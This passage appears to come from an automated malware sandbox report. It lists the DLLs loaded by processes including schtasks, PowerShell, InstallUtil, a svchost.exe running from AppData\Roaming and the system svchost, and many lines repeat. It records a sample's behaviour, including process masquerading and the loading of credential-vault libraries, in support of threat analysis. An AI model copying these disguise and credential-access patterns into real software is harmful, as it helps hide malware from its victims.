                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
